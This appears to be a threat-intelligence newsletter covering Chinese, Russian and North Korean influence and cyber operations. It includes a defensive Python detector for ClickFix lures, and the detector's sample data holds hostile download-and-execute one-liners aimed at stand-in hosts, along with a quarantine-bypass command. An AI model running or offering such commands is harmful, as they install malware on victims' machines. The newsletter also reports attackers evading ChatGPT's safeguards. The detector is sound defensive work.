Monday, Sep 22, 2025 // (IG): BB // GITHUB // SN R&D
China’s Victory Day Parade Signals Strategic Shift: Military Show and Alliances Underscore Dual Messaging
Bottom Line Up Front (BLUF): China’s 3 September Victory Day parade in Beijing was more than a display of military hardware — it was a geopolitical performance aimed at two distinct audiences. Domestically, it sought to project unity and resilience amid economic uncertainty. Internationally, it delivered a forceful message of alignment with Russia and North Korea, underscoring China’s pivot toward an assertive, non-Western coalition in defiance of U.S.-led order. The parade’s dual narrative — reassurance at home, resistance abroad — reflects Beijing’s recalibrated posture as it leans into confrontation and eschews the "peaceful rise" rhetoric of the past.
Analyst Comments: The visual alignment of Xi, Putin, and Kim on Tiananmen Square sends an unmistakable signal: China is no longer pretending it can sit comfortably in both Western and revisionist camps. The military rollout — including DF-61 ICBMs, anti-ship hypersonics, undersea drones, and cyber warfare units — was a direct message to U.S. defense planners. But the deeper takeaway is political: China is now comfortable openly aligning with sanctioned, authoritarian regimes like Myanmar and Zimbabwe, using non-alignment as a shield while tacitly building a counterweight to Western influence. That said, this assertiveness risks overreach. The domestic message of inevitable triumph will be harder to sustain if economic headwinds worsen, and internationally, Beijing may accelerate the very coalition-building it hopes to fragment. Xi’s invocation of WWII cooperation in a call with Trump days later suggests that even China knows it can’t entirely abandon engagement.
FROM THE MEDIA: While the parade emphasized domestic confidence through slogans like “People shall prevail,” its real audience was global. The joint appearance of Xi Jinping, Vladimir Putin, and Kim Jong-un — described by analysts as an “axis of upheaval” — telegraphed a rejection of Western dominance. Beijing showcased weapons systems like DF-61s and anti-ship hypersonics tailored to counter U.S. assets in the Indo-Pacific. The messaging was nuanced: China framed the event as anti-fascist, not anti-Western, to appeal to Global South leaders. But with India’s Modi absent and Japan pushing against participation, regional tensions were on full display. Beijing’s later reference to WWII cooperation with the U.S. suggests a continued effort to balance assertiveness with diplomatic maneuvering.
READ THE STORY: The Interpreter
Leaked Documents Reveal China’s Global Firewall Expansion: Censorship Tech Found in Four Nations
Bottom Line Up Front (BLUF): A trove of leaked documents confirms that China is exporting its internet censorship and surveillance infrastructure — known as the “Great Firewall” — to authoritarian regimes worldwide. Geedge Networks, a Chinese tech firm led by Fang Binxing (the Firewall’s original architect), has deployed these capabilities in Pakistan, Myanmar, Kazakhstan, and Ethiopia. These tools enable mass surveillance, traffic decryption, and content suppression — and point to a broader campaign to entrench CCP-style information control globally.
Analyst Comments: The global proliferation of Chinese surveillance infrastructure should set off alarms across the U.S. and allied intelligence communities. This is not just authoritarian tech-for-hire — it’s the codification of Beijing’s strategic vision: security through suppression. Geedge’s export model fits squarely within the Belt and Road Initiative, revealing that information dominance is now part of China’s soft power toolkit. As former NSC official Matt Pottinger put it, the fact that Washington has done “very little” to counter this speaks to a dangerous complacency. These systems are already operational in conflict zones and are used to silence dissent. If allowed to continue unchallenged, the CCP’s digital authoritarianism will bleed into the global commons, eroding norms around privacy, encryption, and free expression.
FROM THE MEDIA: The documented capabilities go well beyond traditional lawful-intercept tooling: countrywide network tapping, monitoring of mobile communications, and decryption of encrypted traffic (in practice, this means interception at the network edge and exploitation of weak or downgraded protocols, since properly end-to-end-encrypted traffic cannot be read wholesale). In Ethiopia, Geedge tools were reportedly used during the Tigray conflict and to suppress religious protests. Myanmar’s junta used similar technology to monitor and arrest citizens for anti-regime content on platforms such as Telegram and TikTok. While Vice President J.D. Vance criticized European speech laws in a recent speech, the Trump administration has remained largely silent on China’s digital repression abroad. Analysts warn that U.S. inaction enables the spread of CCP influence and normalizes surveillance-driven governance.
READ THE STORY: The Dispatch
Russia, China, and Iran Exploit Charlie Kirk Shooting in Coordinated Disinformation Push
Bottom Line Up Front (BLUF): In the wake of Charlie Kirk’s assassination at Utah Valley University, state-linked media and online influence networks from Russia, China, and Iran have launched a coordinated disinformation campaign blaming foreign adversaries like Ukraine, Israel, and U.S. political factions for the killing. Despite clear evidence that the shooter acted alone, these narratives aim to exploit American political divisions, erode trust in democratic institutions, and divert global attention from their own domestic and geopolitical controversies.
Analyst Comments: This is textbook exploitation of a domestic crisis by foreign influence actors. The volume, speed, and thematic alignment across Russian, Chinese, and Iranian media indicate more than opportunism—this is information warfare at scale, designed to inflame U.S. culture wars and undermine confidence in U.S. stability. The inclusion of fabricated FEC screenshots and coordinated amplification via known ops like Russia’s Operation Overload points to sustained cross-platform manipulation. With the closure of the State Department’s R/FIMI disinfo hub, monitoring of such activity may now rely more heavily on independent researchers and private-sector threat intel teams.
FROM THE MEDIA: According to NewsGuard, over 6,000 mentions of Kirk’s death appeared in Chinese, Russian, and Iranian media in the week following the event, many containing false or misleading claims. The Institute for Strategic Dialogue linked much of this activity to Operation Overload, a known Russian influence campaign using fake news stories, AI-generated images, and inflammatory content to exploit social divisions in the U.S., targeting both conservative and LGBTQ+ audiences. This incident underscores how adversarial states continue to hijack domestic American tragedies to deepen political polarization, erode institutional trust, and discredit democratic governance—often moving faster than U.S. response capabilities, especially following the recent dismantling of the State Department’s R/FIMI disinformation monitoring hub.
READ THE STORY: Forbes
China’s “Safe China” Security Model Gains Global Traction, Challenging Western Norms
Bottom Line Up Front (BLUF): China is exporting its internal security model, centered on high-tech policing, mass surveillance, and political control, through its Global Public Security Cooperation Forum, held annually in Lianyungang. The 2025 event attracted over 2,000 participants, including officials from Interpol and governments across the Global South. China is positioning its surveillance-driven “Peaceful China” framework (Ping’an Zhongguo, also rendered “Safe China”) as a global standard for public safety, offering an alternative to the U.S.-led security paradigm, particularly in countries seeking to suppress dissent under the banner of stability.
Analyst Comments: This isn’t just soft power—it’s surveillance diplomacy. The real headline is that Beijing is building a parallel global security architecture, not through tanks or treaties, but through camera networks, predictive policing software, and crime index rankings. For autocrats and fragile democracies, China’s model offers turnkey repression—efficient, high-tech, and plausibly deniable. What’s alarming is not that dictators want this—it’s that it’s increasingly palatable to democratically elected leaders dealing with urban crime or unrest. Watch for growing export of Huawei surveillance systems, joint training programs, and normalized use of AI facial recognition as “public safety infrastructure.”
FROM THE MEDIA: While attention focused on Beijing’s military-hosted Xiangshan Forum, the Ministry of Public Security held its Global Public Security Cooperation Forum in Lianyungang. The event—now China’s flagship global security outreach platform—showcased AI-powered policing tools and Huawei's surveillance tech, which boasts the ability to track targets across bodycams and facial databases. Attendees toured state-of-the-art police academies and heard China's Public Security Minister Wang Xiaohong promote China as the world’s safest country, referencing its low violent crime and terrorism rates.
READ THE STORY: FT
Huawei Unveils Massive AI Clusters to Replace Nvidia, Push for Technological Autonomy
Bottom Line Up Front (BLUF): In response to U.S. export controls and Beijing’s directive that Chinese firms stop buying Nvidia AI chips, Huawei has announced its most ambitious AI infrastructure to date: the SuperPoD Interconnect and two planned AI superclusters, the Atlas 950 and Atlas 960. These systems are designed to lash together hundreds of thousands of Ascend neural processing units (NPUs) and, by Huawei’s own figures, match or exceed Western systems, including Nvidia’s NVLink-based platforms and xAI’s “Colossus.” The move signals China’s accelerating shift from dependency toward full-stack AI autonomy.
Analyst Comments: Huawei’s pivot from chip buyer to system builder shows how U.S. sanctions have backfired in the long run, galvanizing China to develop its supply chain at scale. While Ascend chips still lag Nvidia in single-chip performance, Huawei’s plan to cluster over a million NPUs using SuperPoD interconnect is a credible challenge to Nvidia’s hegemony. The claimed 6.7x lead of an Atlas 950 SuperPoD over Nvidia’s NVL144 is eye-catching but unverified; the real story is scalability and control. If the CloudMatrix 384 does outperform Nvidia’s GB200 NVL72 in aggregate compute, as Huawei reports, the company could close the performance gap within a few years. For Western analysts and supply chain strategists, this reduces the leverage that export controls once provided. One caveat: aggregate-compute comparisons say nothing about interconnect efficiency, power draw, or software maturity, so the headline multiples should be read as vendor figures until independently benchmarked.
FROM THE MEDIA: Following Beijing’s restrictions on Nvidia hardware purchases by Chinese firms, Huawei revealed several new AI infrastructure products, notably the Atlas 950 and Atlas 960 SuperClusters, powered by Ascend NPUs. The SuperPoD Interconnect allows up to 15,000 accelerators to operate as a single system, comparable to Nvidia’s NVLink. Huawei claims the Atlas 950 offers 1.3x the computing power of xAI’s Colossus and that a single Atlas 950 SuperPoD with 8,192 Ascend chips can outperform Nvidia’s NVL144 by 6.7x. For its CloudMatrix 384 system, Huawei reports 300 petaflops of compute, well above the 180 petaflops it cites for Nvidia’s comparable NVL72 setup. The product line is Huawei’s answer to deepening tech decoupling between China and the U.S., driven by national security concerns. The company aims to launch three more Ascend generations by 2028, each promising to double computing power.
READ THE STORY: RHC
China-Linked Hackers Impersonate Congressional Leader in Sanctions-Themed Phishing Campaign
Bottom Line Up Front (BLUF): Hackers tied to the Chinese cyber-espionage group APT41 impersonated Rep. John Moolenaar, chair of the House Select Committee on U.S.-China strategic competition, in a targeted phishing campaign aimed at law firms, think tanks, trade groups, and at least one foreign government. The emails included draft sanctions legislation to lend credibility, but the attachments and links delivered malware intended to gain access to recipients’ systems, turning a routine legislative workflow into an intrusion vector.
Analyst Comments: This operation goes beyond the usual cyber espionage playbook. By co-opting the identity of a sitting congressional committee chair, China’s hackers exploited the trust-based, informal nature of U.S. policymaking. This wasn’t just about stealing data — it was about compromising credibility. Congress lacks centralized cybersecurity resources, and that decentralization is being weaponized. While the technical tools are familiar — spoofing, phishing, malware — the target is new: the core democratic process that underpins U.S. foreign policy. The fact that this campaign coincided with sensitive U.S.-China trade talks underscores its strategic intent. This is an escalation, and Washington should treat it as such.
FROM THE MEDIA: Using Moolenaar’s name and title, the hackers circulated draft sanctions legislation to external stakeholders, a move designed to trick recipients into opening malicious attachments or links. The timing coincided with high-stakes negotiations over tariffs, semiconductors, and cloud restrictions. While no confirmed breaches have been reported, the targeting of external policy influencers, including law firms and think tanks, points to a broader intelligence-gathering strategy built on institutional impersonation. Experts warn that this signals a shift in cyber operations: from attacking systems to mimicking the daily processes of democratic governance. A practical check for recipients: verify the sending domain and authentication headers against the committee’s official addresses, and treat any unsolicited legislative draft that arrives as an attachment or link as suspect until confirmed out-of-band.
READ THE STORY: Forbes
Russian Jet Incursions and Airport Cyberattacks Heighten NATO Tensions
Bottom Line Up Front (BLUF): Russian military aircraft have again tested NATO’s resolve, with recent airspace violations over Estonia and drone incursions into Poland and Romania, prompting emergency responses and a U.N. Security Council meeting. At the same time, a cyberattack disrupted airport operations across Europe, with analysts suggesting likely Kremlin involvement. These incidents reflect Russia's widening hybrid warfare strategy, combining kinetic posturing and cyber sabotage to destabilize NATO and project power.
Analyst Comments: Aerial provocations, conducted without transponders, flight plans, or radio contact, are textbook attempts to normalize escalatory behavior and probe NATO response times. However, the timing of these incursions alongside a cyberattack targeting airport infrastructure strongly hints at a coordinated pressure campaign. Asymmetric tactics allow Russia to exert influence while maintaining plausible deniability, especially when paired with state-aligned hacker groups. With the Kremlin brushing off peace overtures and NATO scrambling interceptors regularly, the risk of miscalculation rises. The cyber dimension is more worrisome: the airport disruptions tied to Collins Aerospace systems suggest a focus on chokepoints in civil infrastructure, and a single shared vendor for check-in and boarding becomes a single point of failure across many airports at once. The Cold War didn’t end; it migrated to the digital and gray-zone space.
FROM THE MEDIA: The airport disruption followed the alleged violation of Estonian airspace by three Russian MiG-31s, which prompted Estonia’s first-ever request for an emergency U.N. Security Council meeting. In parallel, analysts linked a weekend cyberattack that disrupted flights at London’s Heathrow and other European airports to Russia-aligned hacker groups; the incident affected check-in technology supplied by Collins Aerospace, though attribution remained unconfirmed at the time of reporting. NATO officials said the alliance is “at war with Russia in cyber every day,” underscoring how traditional airspace incursions are now paired with information warfare and cyber sabotage.
READ THE STORY: The Washington Times
Gamaredon and Turla Collaborating in Ukraine: Rare FSB APT Team-Up Increases Cyber Espionage Precision
Bottom Line Up Front (BLUF): Russian state-linked APT groups Gamaredon and Turla were observed collaborating on cyberattacks against Ukrainian targets between February and April 2025. ESET researchers found multiple co-compromised systems where Gamaredon first deployed access tools, later leveraged by Turla to install its Kazuar backdoor. This operational handoff marks the first technical evidence of direct coordination between these two FSB-affiliated threat actors.
Analyst Comments: This is a rare and significant moment in Russian cyber operations. Gamaredon (noisy, fast, and mass-scale) and Turla (stealthy, selective, and high-value) have historically operated in parallel — not in tandem. Their collaboration suggests strategic targeting where Gamaredon provides broad access, and Turla picks through the intelligence goldmine. While shared FSB origins have long been suspected to enable resource overlap, ESET’s telemetry offers hard evidence. Using Gamaredon implants to restart and deploy Turla’s Kazuar malware shows coordination and a clear division of labor. This fusion of speed and precision increases threat persistence and complicates attribution and response — especially for Ukraine’s already strained cyber defenses.
FROM THE MEDIA: In some cases, Gamaredon’s implants were used to restart or sideload Turla’s malware, indicating direct operational cooperation. Although the two groups have historically been tied to different FSB centers (Gamaredon to Center 18, Turla to Center 16), their overlapping activity points to increased coordination within the Russian intelligence ecosystem. Researchers believe it is highly likely that Gamaredon handed off access to Turla rather than both groups targeting the same system independently. ESET has published IoCs and malware samples tied to this operation.
READ THE STORY: Security Affairs
Cyber Spies Go High-Tech: North Korea Turns to ChatGPT for Phishing
Bottom Line Up Front (BLUF): North Korean APT group Kimsuky is using ChatGPT-generated deepfake military IDs in spear-phishing emails to target South Korean journalists, researchers, and human rights activists. According to cybersecurity firm Genians, the attackers bypassed AI content safeguards to generate convincing ID documents, weaponizing generative AI to enhance deception. This marks a further evolution in DPRK’s use of AI to augment espionage, influence, and cybercrime operations.
Analyst Comments: Kimsuky’s use of AI-generated ID cards is a tactical innovation with strategic implications. Where prior phishing relied on typos and crude graphics, this marks a shift toward AI-enhanced credibility engineering. The fact that attackers bypassed ChatGPT’s restrictions shows the limitations of current safeguards and the adaptive nature of threat actors. More troubling is how easily generative tools can be repurposed — from creating malware to building impersonation assets — with little technical overhead. For defenders, verifying authenticity can no longer stop at the visual or surface level. Validation must extend to metadata, document provenance, and behavioral context.
FROM THE MEDIA: The ID cards were convincingly realistic and generated with ChatGPT via obfuscated prompts. Genians noted that this deception tactic was part of a broader trend of AI-enabled cyber intrusions. U.S. officials have long linked Kimsuky to strategic intelligence collection, and recent campaigns show an expansion into financial crimes and disinformation. In 2025, Anthropic reported North Korean operatives using AI models like Claude to pass job interviews and infiltrate U.S. tech firms. The synergy between deepfake visuals, phishing, and malware delivery is part of Pyongyang's growing AI-powered offensive toolkit.
READ THE STORY: The 420
North Korean Hackers Expand Target Profile with BeaverTail Malware via ClickFix Phishing
Bottom Line Up Front (BLUF): North Korean threat actors — likely affiliated with the Lazarus Group — are now deploying BeaverTail and InvisibleFerret malware via ClickFix-style phishing lures targeting marketing, trader, and sales roles in the cryptocurrency and retail sectors. This marks a tactical shift away from exclusively targeting software developers. The latest campaign uses compiled malware across Windows, macOS, and Linux, distributed through fake Web3 hiring platforms.
Analyst Comments: Threat actors are banking on reduced operational awareness among non-engineering staff by shifting focus to less technical roles. Using compiled binaries for multi-platform deployment — paired with ClickFix tactics — emphasizes scalability and adaptability. The simplified version of BeaverTail suggests a more surgical data theft objective, with fewer browser targets and removal of broader collection capabilities. That may be a trial run for focused reconnaissance or credential harvesting.
FROM THE MEDIA: The campaign employed a fake Vercel-based hiring platform, capturing victim IPs and using fabricated technical errors to prompt OS-specific commands. This deployed a leaner variant of BeaverTail, an info-stealer first exposed in 2023. The malware now only targets eight browser extensions (down from 22) and focuses exclusively on Google Chrome. Windows variants leveraged password-protected ZIP archives to sideload InvisibleFerret, a Python-based backdoor. SentinelOne confirmed over 230 individuals targeted between January and March 2025 using similar job scams involving companies like Robinhood and Archblock. In parallel, DPRK groups such as APT37 have been seen using VCD ransomware, Rust-based implants (CHILLYCHINO), and advanced surveillance tools (FadeStealer) in increasingly multifaceted operations.
READ THE STORY: THN
Atomic Infostealer Campaign Targets macOS Users via Fake GitHub Repositories
Bottom Line Up Front (BLUF): A widespread malware campaign is using SEO-optimized fake GitHub repositories to distribute the Atomic macOS Stealer (AMOS), targeting macOS users searching for software like LastPass. Victims are tricked into running terminal commands that download and execute the stealer payload. The ongoing campaign is part of a broader trend exploiting trusted platforms (GitHub, Google Ads) to push malware to technically curious but unsuspecting users.
Analyst Comments: This is a sharp escalation in macOS-focused threat activity: AMOS is being repackaged and distributed at scale through cloned developer ecosystems such as GitHub. By spoofing names like “LastPass on MacBook” and using SEO poisoning, attackers catch users where they search for help or downloads. The delivery vector, a pasted terminal command built around a curl call, is classic social engineering aimed at power users; it also sidesteps Gatekeeper, because a binary fetched with curl carries no quarantine attribute and is launched by the user rather than by a downloaded app bundle. With GitHub often allow-listed in corporate environments, this poses a growing supply-chain-adjacent risk. Expect these campaigns to expand toward other high-value macOS software brands (e.g., 1Password, Docker, VS Code).
FROM THE MEDIA: LastPass has reported a widespread macOS infostealer campaign abusing GitHub to impersonate brands and deliver AMOS malware. Two fraudulent repositories using LastPass branding were discovered on September 16, posted by the user modhopmduck476, redirecting to macprograms-pro[.]com. Users were instructed to run a terminal command that initiates a curl request, downloads a malicious payload, and drops it into the /tmp directory.
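The BeaverTail ClickFix lures and the fake-repository AMOS command above share one observable: a pasted shell one-liner that downloads a payload into a temp directory or pipes it straight into a shell. The script below is an added example, not code from LastPass, SentinelOne, or the articles cited, that scores command lines from shell history, EDR process telemetry, or the text of a suspicious "fix" page against that pattern and reports which signals fired. The signal list, weights, threshold, and sample lines are assumptions constructed for illustration; none of the sample lines is captured from the real campaigns.

```python
"""Heuristic scorer for ClickFix-style 'paste this into your terminal' lures.

Added example; not the tooling of LastPass, SentinelOne, or the cited articles.
Input: command lines (bash/zsh history, EDR process-creation events, or the
text of a suspicious 'fix' page). Output: a score plus the signals that fired.
Signals, weights, threshold and sample lines are constructed assumptions.
"""
import re
from dataclasses import dataclass, field

# Each signal is (name, pattern, weight). Weights are illustrative, not tuned.
SIGNALS = [
    # A network fetch issued from the command line (macOS/Linux and Windows forms).
    ("downloader", re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest|certutil\s+-urlcache)\b", re.I), 2),
    # Fetched content executed directly, never landing as a file the user can inspect.
    ("pipe_to_shell", re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\|\s*(iex|Invoke-Expression)\b", re.I), 3),
    # Payload staged in a temp directory, as in the AMOS lure above.
    ("tmp_drop", re.compile(r"/tmp/|/var/tmp/|\$TMPDIR|%TEMP%|\$env:TEMP", re.I), 2),
    # Download chained straight into execution in the same line.
    ("exec_chain", re.compile(r"(;|&&)\s*(chmod\s+\+x|open\s|\./|nohup\s|(ba|z)?sh\s|python3?\s)", re.I), 2),
    # Stripping the macOS quarantine attribute so Gatekeeper never evaluates the file.
    ("quarantine_bypass", re.compile(r"xattr\s+-[a-z]*[dc][a-z]*\b.*quarantine|spctl\s+--master-disable", re.I), 3),
    # Encoded payloads hide the real URL or command from the person pasting it.
    ("encoded", re.compile(r"base64\s+(-d|-D|--decode)|-EncodedCommand|\s-e(nc)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    # Raw IP literals are rare in legitimate install instructions.
    ("ip_literal", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I), 1),
]
THRESHOLD = 5  # assumption: tune against your own history/telemetry baseline


@dataclass
class Verdict:
    line: str
    score: int
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_command(line: str) -> Verdict:
    """Score one command line and record which signals matched, in SIGNALS order."""
    verdict = Verdict(line=line.strip(), score=0)
    for name, pattern, weight in SIGNALS:
        if pattern.search(line):
            verdict.reasons.append(name)
            verdict.score += weight
    return verdict


def scan_lines(lines):
    """Return only verdicts at or above THRESHOLD, highest score first (stable)."""
    verdicts = [score_command(ln) for ln in lines if ln.strip()]
    return sorted((v for v in verdicts if v.suspicious), key=lambda v: -v.score)


# Constructed sample lines; not captured from the real campaigns.
SAMPLE_LINES = [
    "brew install --cask lastpass",
    "ls -la /tmp/",
    "curl -fsSL https://get.example.test/install.sh -o get-installer.sh",
    # AMOS-style lure: fetch into /tmp, mark executable, run.
    "curl -fsSL https://macprograms-pro.example/LastPass -o /tmp/update && chmod +x /tmp/update && /tmp/update",
    # ClickFix-style lure: fetch and pipe straight into a shell.
    "curl -s https://fix.example.test/x | bash",
    # Windows ClickFix variant pasted into the Run dialog.
    'powershell -w hidden -c "iwr http://203.0.113.7/x.txt | iex"',
    # Quarantine-stripping variant.
    "xattr -d com.apple.quarantine /tmp/update; open /tmp/update",
]

if __name__ == "__main__":
    for v in scan_lines(SAMPLE_LINES):
        print(f"[{v.score}] {', '.join(v.reasons)}: {v.line}")
```

Legitimate installers also use curl piped to sh, so a single signal is deliberately below the threshold; the point is the combination of a fetch with a temp-directory drop, an execution chain, or a quarantine strip in one pasted line. Run it over ~/.zsh_history or an EDR command-line export and review anything it returns before acting on it.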
READ THE STORY: SecurityWeek
Taiwan Defense Budget Surge Spurs Tech-Heavy Arms Expo, Porcupine Strategy in Focus
Bottom Line Up Front (BLUF): Taiwan’s defense spending will rise to 3.32% of GDP in 2026, signaling a rapid shift toward asymmetric defense in response to China's growing missile and drone arsenal. This year’s Taipei Aerospace & Defense Technology Exhibition—Taiwan’s largest to date—showcased uncrewed systems, cyber defense initiatives, and indigenous missile development, with high-profile foreign participation from Israel and the U.S. The event reflected Taiwan’s effort to harden its defenses through joint ventures, domestic innovation, and controversial workarounds to Missile Technology Control Regime constraints.
Analyst Comments: This exhibition was more than a trade show—it was strategic messaging. With participation from 14 countries and defense firms like Anduril and Kratos, Taiwan demonstrated its seriousness about implementing a porcupine strategy: saturating the battlespace with small, innovative, and survivable systems. Notably, the Chiang-Kong high-altitude air defense system and the growing presence of uncrewed maritime and aerial platforms show Taiwan is preparing for both missile salvos and gray-zone incursions. The island is also clearly testing the limits of MTCR restrictions, particularly in cooperation with Israeli defense firms, drawing U.S. scrutiny.
FROM THE MEDIA: Taiwan’s biennial defense exhibition (Sept 18–20) featured more than 400 exhibitors, including first-time returns by Elbit Systems of America and other Israeli firms, whose participation drew anti-Israel protests. The Ministry of National Defense (MND) emphasized asymmetric warfare, cybersecurity, and national mobilization under the All-Out Defense Initiative, supported by the All-Out Defense Mobilization Agency. MND sources didn’t rule out a surface-to-surface variant of Chiang-Kong, potentially challenging MTCR restrictions. Taiwan, while not a formal signatory, remains under U.S.-enforced compliance. China, meanwhile, continues to violate the regime while lobbying for inclusion. The exhibition reflects Taipei’s push for greater defense autonomy without abandoning key international partnerships.
READ THE STORY: ASPI
Items of interest
Trump’s Education Agenda Undermines Public Schools — But Americans Aren’t Buying It
BOTTOM LINE UP FRONT (BLUF): Despite aggressive efforts by Donald Trump and GOP allies to privatize K-12 education through school voucher expansion, public school enrollment has remained broadly stable. A recent Tulane University study found only a 3–4% increase in private school enrollment across states with new voucher programs since 2021, suggesting broad public support for public education remains intact — even as federal pressure mounts to dismantle it.
ANALYST COMMENTS: Trump's attacks on public education aren’t just budgetary — they’re ideological. The push for vouchers is part of a broader effort to weaken one of the last civic institutions where Americans interact across social and political divides. It’s no coincidence that public schools, long a target of authoritarian regimes, are under siege by a political movement that thrives on disinformation and division. The Trump agenda isn’t about parental choice — it’s about political control and ideological grooming. That said, resistance is real: the limited impact of vouchers, combined with teacher union pushback and state-level innovation like phone bans and project-based learning, shows the public school system is down but far from out.
FROM THE MEDIA: The Trump administration and allied Republicans have ramped up efforts to dismantle the Department of Education, cut federal education budgets, and expand school vouchers — disproportionately benefiting religious and affluent families. Yet a Tulane University analysis of 11 states that adopted voucher programs since 2021 shows only modest growth in private school enrollment. The programs often don’t cover full tuition, limiting access mostly to cheaper, faith-based schools. Meanwhile, public support for K-12 schools remains strong across party lines. Teachers’ unions, particularly the AFT led by Randi Weingarten, are responding with strategic plans to defend public education against political interference. Weingarten, labeled by former Secretary of State Mike Pompeo as “the most dangerous person in the world,” argues in her book Why Fascists Fear Teachers that public schools threaten authoritarianism by promoting critical thinking and civic engagement. Initiatives like school phone bans and collaborative, project-based learning reflect this mission — and may be key to resisting ideological capture.
READ THE STORY: FT
How Vouchers Affect Public Schools and Why It Matters (Video)
FROM THE MEDIA: In this episode of Don't IEP Alone, host Lisa Lightner delves into the intricacies of IDEA (Individuals with Disabilities Education Act) and the implications of public versus private education for children with special needs. Lisa provides a historical overview of IDEA's origins, linking it to a significant Pennsylvania court case that laid the groundwork for the legislation.
Private School Vouchers Hurt Our Students (Video)
FROM THE MEDIA: The 2025 House-passed budget reconciliation bill includes a national private school voucher proposal known as the Educational Choice for Children Act. The program would create a tax credit, giving away $5 billion per year of federal taxpayer dollars to fund private school voucher programs. Vouchers open the door to discrimination against students and hurt the public schools that serve the majority of children in this country.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.